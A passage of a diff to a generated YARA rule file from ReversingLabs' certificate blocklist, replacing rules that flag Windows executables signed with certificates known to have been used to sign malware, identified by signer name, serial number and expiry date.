 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "71ab4bd7e85155bfbc1612941c5f15c409629b116258c38b79bd808512df006a"
+		logic_hash = "f13f9b70a2a3187522e4fff45a8a425863ad6242f82592aa9319c8d5fddeeefa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23933,21 +46327,21 @@ rule REVERSINGLABS_Cert_Blocklist_Eeefec4308Abe63323600E1608F5E6F2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YUPITER-STROI, OOO" and ( pe.signatures [ i ] . serial == "00:ee:ef:ec:43:08:ab:e6:33:23:60:0e:16:08:f5:e6:f2" or pe.signatures [ i ] . serial == "ee:ef:ec:43:08:ab:e6:33:23:60:0e:16:08:f5:e6:f2" ) and 1491177600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orangetree B.V." and ( pe.signatures [ i ] . serial == "00:7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" or pe.signatures [ i ] . serial == "7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" ) and 1606159604 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Ecd460Ce14Bd8Ef2926Da2Cd9A44176 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Bad35Fd70025D46C56B89E32B1A3954C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "94128695-0206-5c04-b792-34400f8ce890"
+		id = "871e399f-8498-5d66-ab5e-24e48491124f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12648-L12664"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6656-L6674"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "58fa244c125415ef7a3cf0feb79add4db7c84f94c23e5d27e840fb17c18d67ef"
+		logic_hash = "1020250fc5030e50bc1e7d0f0c5a77e462a53f47bfcc4383c682b34fed567492"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23957,21 +46351,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Ecd460Ce14Bd8Ef2926Da2Cd9A44176 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rabah Azrarak" and pe.signatures [ i ] . serial == "0e:cd:46:0c:e1:4b:d8:ef:29:26:da:2c:d9:a4:41:76" and 1463035153 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fort LLC" and ( pe.signatures [ i ] . serial == "00:ba:d3:5f:d7:00:25:d4:6c:56:b8:9e:32:b1:a3:95:4c" or pe.signatures [ i ] . serial == "ba:d3:5f:d7:00:25:d4:6c:56:b8:9e:32:b1:a3:95:4c" ) and 1604937337 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5E75E997F3D70Bb8C182D56B25B7D836 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7B91468122273Aa32B7Cfc80C331Ea13 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3578b97f-1d87-517a-8ea9-17606017e46a"
+		id = "2a949015-3b7b-5123-8df1-f2199ef636c9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12666-L12682"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6676-L6692"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a2c6a57759fb0717951f83a32c00deeae82cad772b6cb7f60fa96232b6b82560"
+		logic_hash = "49d6fd8b325df4bc688275a09cee35e1040172eb6f3680aa2b6f0f3640c0782e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23981,21 +46375,21 @@ rule REVERSINGLABS_Cert_Blocklist_5E75E997F3D70Bb8C182D56B25B7D836 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Primetech Ltd." and pe.signatures [ i ] . serial == "5e:75:e9:97:f3:d7:0b:b8:c1:82:d5:6b:25:b7:d8:36" and 1324252800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO KBI" and pe.signatures [ i ] . serial == "7b:91:46:81:22:27:3a:a3:2b:7c:fc:80:c3:31:ea:13" and 1586942863 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D5690D94F15315E143Db10Af35497Dc5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3E267B5D14Cdf1F645C1Ec545Cec3Aee : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "324b2e2f-bad7-5ac4-864c-044d99fa01dc"
+		id = "adff6ae2-076c-5c97-9fea-f95d770a3821"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12684-L12702"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6694-L6710"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4ac17d0f0e4ef2bb5f6cda8e7cb07a641d49c83465a0a80c46ff6e0e752d1847"
+		logic_hash = "e36ae57d715a71aa7d26dd003d647dfa7ab16d64e5411b6c49831544fc482645"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24005,21 +46399,21 @@ rule REVERSINGLABS_Cert_Blocklist_D5690D94F15315E143Db10Af35497Dc5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PET SERVICES d.o.o." and ( pe.signatures [ i ] . serial == "00:d5:69:0d:94:f1:53:15:e1:43:db:10:af:35:49:7d:c5" or pe.signatures [ i ] . serial == "d5:69:0d:94:f1:53:15:e1:43:db:10:af:35:49:7d:c5" ) and 1576195200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO KBI" and pe.signatures [ i ] . serial == "3e:26:7b:5d:14:cd:f1:f6:45:c1:ec:54:5c:ec:3a:ee" and 1579825892 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8223C74185Add0927246F5E33Ebac467 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ae6D3C0269Ef6497E14379C51A8507Ba : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dfe87130-7b2f-5f8a-8c2d-8653c2bd0cd3"
+		id = "5b8e7730-cb8b-5c51-9784-d944453bc898"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12704-L12722"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6712-L6730"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f700b4f7cdfda9f678c3a5259d4293640c50567ec277c5b3db69756534e2007f"
+		logic_hash = "23570962c80bddce28a3dee9d4d864cf3cf64018eec6fbcbdd3ca2658c9f660f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24029,21 +46423,21 @@ rule REVERSINGLABS_Cert_Blocklist_8223C74185Add0927246F5E33Ebac467 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOV Virikton" and ( pe.signatures [ i ] . serial == "00:82:23:c7:41:85:ad:d0:92:72:46:f5:e3:3e:ba:c4:67" or pe.signatures [ i ] . serial == "82:23:c7:41:85:ad:d0:92:72:46:f5:e3:3e:ba:c4:67" ) and 1463616000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VELES PROPERTIES LIMITED" and ( pe.signatures [ i ] . serial == "00:ae:6d:3c:02:69:ef:64:97:e1:43:79:c5:1a:85:07:ba" or pe.signatures [ i ] . serial == "ae:6d:3c:02:69:ef:64:97:e1:43:79:c5:1a:85:07:ba" ) and 1578566034 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Dd9E9E1D7C573714E3F567C5380Ae6D0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fd8C468Cc1B45C9Cfb41Cbd8C835Cc9E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "72745795-0261-5b7b-b25e-8220bced90ec"
+		id = "f0050a52-65d5-54b2-b06d-08812af98948"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12724-L12742"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6732-L6750"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7bbcdb989d53bafbb2bdb694be72d4f7305323c01e8f1eafcb7cd889df165ff6"
+		logic_hash = "230d33f0d1d31d4cb76bf3b13f109d3cc9ace846daef145e1dc7666b33c8a42a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24053,21 +46447,21 @@ rule REVERSINGLABS_Cert_Blocklist_Dd9E9E1D7C573714E3F567C5380Ae6D0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CREA&COM d.o.o." and ( pe.signatures [ i ] . serial == "00:dd:9e:9e:1d:7c:57:37:14:e3:f5:67:c5:38:0a:e6:d0" or pe.signatures [ i ] . serial == "dd:9e:9e:1d:7c:57:37:14:e3:f5:67:c5:38:0a:e6:d0" ) and 1575849600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pivo ZLoun s.r.o." and ( pe.signatures [ i ] . serial == "00:fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" or pe.signatures [ i ] . serial == "fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" ) and 1604019600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3D5E71 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7C061Baa3118327255161F6A7Fa4E21D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7180b20d-f367-5260-88cd-dd2a1269f89b"
+		id = "f597956a-d11b-54e4-91b6-0572c0b10279"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12744-L12760"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6752-L6770"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "aa73ac6569e4bb0084d7b148b2186ec2737a691a133319b21b666aa16bca9f2d"
+		logic_hash = "4193fce69af03b3521a3cc442b762c52f8585b44fa6b0bd78b9ace171b807ed4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24077,21 +46471,21 @@ rule REVERSINGLABS_Cert_Blocklist_3D5E71 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OF.PL sp. z o.o." and pe.signatures [ i ] . serial == "3d:5e:71" and 1066997730 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YUTAKS, OOO" and ( pe.signatures [ i ] . serial == "00:7c:06:1b:aa:31:18:32:72:55:16:1f:6a:7f:a4:e2:1d" or pe.signatures [ i ] . serial == "7c:06:1b:aa:31:18:32:72:55:16:1f:6a:7f:a4:e2:1d" ) and 1599611338 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C33187Fe848A65E8484Ea492Cb2Cbb18 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_04332C16724Ffeda5868D22Af56Aea43 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fa05113a-a21e-5f21-aae3-b646e5b42dfb"
+		id = "1e5a2708-2875-50ab-af6b-3be91f38e13f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12762-L12780"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6772-L6788"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b66d67b74d73a143cb5301b232abd5f0f84f058223d4494b924a25dffb49037a"
+		logic_hash = "6b62d5c7a3c6e3096797cd2f515d86045fa77682638bda44175d05c5b6c5bbc0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24101,21 +46495,21 @@ rule REVERSINGLABS_Cert_Blocklist_C33187Fe848A65E8484Ea492Cb2Cbb18 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SELCUK GUNDOGDU" and ( pe.signatures [ i ] . serial == "00:c3:31:87:fe:84:8a:65:e8:48:4e:a4:92:cb:2c:bb:18" or pe.signatures [ i ] . serial == "c3:31:87:fe:84:8a:65:e8:48:4e:a4:92:cb:2c:bb:18" ) and 1426204800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bespoke Software Solutions Limited" and pe.signatures [ i ] . serial == "04:33:2c:16:72:4f:fe:da:58:68:d2:2a:f5:6a:ea:43" and 1597971601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Fc143Ba34Cabf1De7A4C7F8F4Cdad6D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_030012F134E64347669F3256C7D050C5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "546692ed-2506-56ad-b678-e74b857380a3"
+		id = "1e61a781-d5fb-5f05-81c4-3cc697ece13c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12782-L12798"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6790-L6806"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ffe25e4478a2245d4e5b330bb9300fb6cb48afb0fe3bd72bd62a589eeee3fe89"
+		logic_hash = "1a55856bfa4c632b2b0404686dc7ba5e7238b619dd4d2eb68c3d291bc86e52c4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24125,21 +46519,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Fc143Ba34Cabf1De7A4C7F8F4Cdad6D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "World Telecom International Inc." and pe.signatures [ i ] . serial == "6f:c1:43:ba:34:ca:bf:1d:e7:a4:c7:f8:f4:cd:ad:6d" and 1147046400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Futumarket LLC" and pe.signatures [ i ] . serial == "03:00:12:f1:34:e6:43:47:66:9f:32:56:c7:d0:50:c5" and 1604036657 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Ac6268B2E431A2C1369346D175D0E30 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fa3Dcac19B884B44Ef4F81541184D6B0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "12664460-19e1-5b73-8299-cfe19dffc0b4"
+		id = "574ee0d4-ba7c-5c74-b711-222f92196f4a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12800-L12816"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6808-L6826"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "27efaba9bd9cd116f640007c1e951bb77757efbe148b5f953e71d6621d7f16b2"
+		logic_hash = "324de84cb8c2f5402c9326749e3456e11312828df2523954fd84f7fb3298fdf3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24149,21 +46543,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Ac6268B2E431A2C1369346D175D0E30 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Install Sync" and pe.signatures [ i ] . serial == "6a:c6:26:8b:2e:43:1a:2c:13:69:34:6d:17:5d:0e:30" and 1436140800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unicom Ltd" and ( pe.signatures [ i ] . serial == "00:fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" or pe.signatures [ i ] . serial == "fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" ) and 1603958571 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Fc4D9178B8Df2C19E269Ac6F43Dd708 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0E6F4Cb8B06E01C3Bd296Ace3A95F814 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b336ff6c-d94e-5715-bb97-6b60cda90911"
+		id = "7a829a63-eeb4-50ef-829d-fc13572c1148"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12818-L12834"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6828-L6844"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "41dfe37b464d337268a8bb0e23124df7b50ab966038e8ad33bda81a4d86040ca"
+		logic_hash = "f3184a9d1fe2a1cf2dcc04d26c284aa9a651d2f00aa28642d7f951550a050138"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24173,21 +46567,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Fc4D9178B8Df2C19E269Ac6F43Dd708 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PK Partnership, OOO" and pe.signatures [ i ] . serial == "0f:c4:d9:17:8b:8d:f2:c1:9e:26:9a:c6:f4:3d:d7:08" and 1466553600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EVATON, s.r.o." and pe.signatures [ i ] . serial == "0e:6f:4c:b8:b0:6e:01:c3:bd:29:6a:ce:3a:95:f8:14" and 1603957781 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E01407871E2146C9Baab1Ae7Ab8Ab172 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_085B70224253486624Fc36Fa658A1E32 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "229772ae-68a2-566b-bf61-988cb41d7d8f"
+		id = "7d27604e-4ecd-559c-9180-4914e7f1f6c9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12836-L12854"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6846-L6862"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1801e7f15bd5f916fc08d263a845d296d334ca9de1040008f619719c1b5c0a3b"
+		logic_hash = "50ff48a421a109f8c6bf92032691d9b673945bc591005004ff17dc18c97d4aea"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24197,21 +46591,21 @@ rule REVERSINGLABS_Cert_Blocklist_E01407871E2146C9Baab1Ae7Ab8Ab172 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOV Intalev Ukraina" and ( pe.signatures [ i ] . serial == "00:e0:14:07:87:1e:21:46:c9:ba:ab:1a:e7:ab:8a:b1:72" or pe.signatures [ i ] . serial == "e0:14:07:87:1e:21:46:c9:ba:ab:1a:e7:ab:8a:b1:72" ) and 1464220800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Best Fud, OOO" and pe.signatures [ i ] . serial == "08:5b:70:22:42:53:48:66:24:fc:36:fa:65:8a:1e:32" and 1597971601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Effc6D19D6Fc85872E4E5B3Ccee6D301 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_51Cd5393514F7Ace2B407C3Dbfb09D8D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "56114e31-2e9b-5d16-8435-708bbb2687cc"
+		id = "ac86893f-2edd-5f1c-96eb-4cb140e8e001"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12856-L12874"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6864-L6880"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a746c4193f1264cb96eae0ea85c2c76b5caf3b72ca950f76af426b4d68d210b3"
+		logic_hash = "4cd08b9113a7c1f4f2d438ac59ad0be503daded3a08b8c8e8ce3e0dfdddf259e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24221,21 +46615,21 @@ rule REVERSINGLABS_Cert_Blocklist_Effc6D19D6Fc85872E4E5B3Ccee6D301 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C\\xC3\\x93IR IP LIMITED" and ( pe.signatures [ i ] . serial == "00:ef:fc:6d:19:d6:fc:85:87:2e:4e:5b:3c:ce:e6:d3:01" or pe.signatures [ i ] . serial == "ef:fc:6d:19:d6:fc:85:87:2e:4e:5b:3c:ce:e6:d3:01" ) and 1572307200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APPI CZ a.s" and pe.signatures [ i ] . serial == "51:cd:53:93:51:4f:7a:ce:2b:40:7c:3d:bf:b0:9d:8d" and 1605299467 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2F4A25D52B16Eb4C9Dfe71Ebbd8121Bb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B72179C027B9037Ee220E81Ab18Fe56D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1afd5d2b-fd6d-58ca-b966-788d465cd0ed"
+		id = "85639e74-80b0-59c6-b31b-5b3d9587b37a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12876-L12892"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6882-L6900"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7b237ae0574afeafcc05f71512c09d3170edbee20e512a1b0af5b431923dc25c"
+		logic_hash = "1416768011ff824307d112bdeecce1ad50d1f673e92bef8fddbbeb58ff98b1b1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -24245,21 +46639,21 @@ rule REVERSINGLABS_Cert_Blocklist_2F4A25D52B16Eb4C9Dfe71Ebbd8121Bb : INFO FILE
 		importance = 25
 
 	condition:
